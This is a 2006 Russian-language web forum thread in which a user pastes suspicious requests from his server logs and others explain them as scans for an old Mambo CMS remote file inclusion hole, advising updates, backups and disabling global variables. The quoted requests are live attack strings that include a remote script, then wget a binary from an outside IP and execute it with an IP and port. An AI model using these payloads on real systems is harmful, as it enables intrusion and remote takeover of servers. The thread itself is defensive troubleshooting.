Главная страницаСоздание сайтовБлог Кузнецова М.В.Статьи о PHPPHP-скриптыСтатьи об ApacheФорум С++КонсультацииФорум "Про Жизнь"
Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5. На примерах. Авторы: Кузнецов М.В., Симдянов И.В., Голышев С.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ 		Консультационный центр SoftTime

Разное
Вход  Регистрация  Список форумов  Живой форум  Архив  RSS-канал  Правила форума  Участники "Online"  Все участники

Выбрать другой форум

 

Здравствуйте, Посетитель!

 Новая тема

 Поиск

  Список тем

вид форума:
Линейный форум Структурный форум

тема: страный запрос

следующая тема
 
 автор: localGhost   (16.01.2006 в 02:29)   письмо автору
  
 

проверял статстику, обратил внимание на странный запрос к странице:

option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;
wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106
%208080;08080;0;echo%20YYY;echo|


может есть у кого предположение что этим хотели сделать?

З.Ы. апач работает под виндой. Сервер только запустили, и там лежит только одна страничка index.php и все, больше там пока ничего нет.

   
 
 автор: cheops   (16.01.2006 в 03:27)   письмо автору
  
   для: localGhost   (16.01.2006 в 02:29)
 

Здесь явно ориентировались на *nix.

   
 
 автор: localGhost   (20.01.2006 в 19:21)   письмо автору
  
   для: cheops   (16.01.2006 в 03:27)
 

елы-палы!! тут точно ничего страшного? что-то я начинаю волноваться! долбят достаточно часто. На это раз зафиксировал вот что:

option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://newporntalents.com/main/images/cse.gif?&cmd=df%20-h

   
 
 автор: Artem S.   (20.01.2006 в 20:51)   письмо автору
  
   для: localGhost   (20.01.2006 в 19:21)
 

нет, если отключили глобальные переменные. А вообще это старая дыра в mambo

   
 
 автор: cheops   (20.01.2006 в 23:13)   письмо автору
  
   для: localGhost   (20.01.2006 в 19:21)
 

То, что ваш сайт хотят сломать уже является нехорошим звоночком, обновите всё, что только можете, слделайте резервные копии, пробейте адреса, скорее всего будут прокси, но бывает злоумышленики ленятся...

   
 
 автор: localGhost   (21.01.2006 в 02:16)   письмо автору
  
   для: cheops   (20.01.2006 в 23:13)
 

проблема в том что, как я упаминал ранее, сервер установлен под виндой, на сервере одна единственная странца (пока) вот к ней постоянно и обращаються. Вычеслить ip не получаеться т.к. всех посетителей перекидывает на сервер маршрутизатор, и все они приходят с одним ip (ip маршрутизатора)

что такое mambo?

   
 
 автор: Саня   (21.01.2006 в 03:43)   письмо автору
  
   для: localGhost   (21.01.2006 в 02:16)
 

Кто-то ищет уязвимости на сервере (в скриптах). XSpider (программа-сканнер), например, имеет большую базу стандартных уязвимостей, по которой и тестируется целевой сайт. Вообще-то такие программы разрабатывались для "ленивых" веб-мастеров, которым неохота проверять свои сайт на уязвимости. Хакерам и особенно скрипт-киддисам такие программы ой как помогают при взломе. Возможно одна из таких прог и бомбардирует вашу страничку.

Mambo - CMS такая (http://ru-mambo.ru/).

   
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования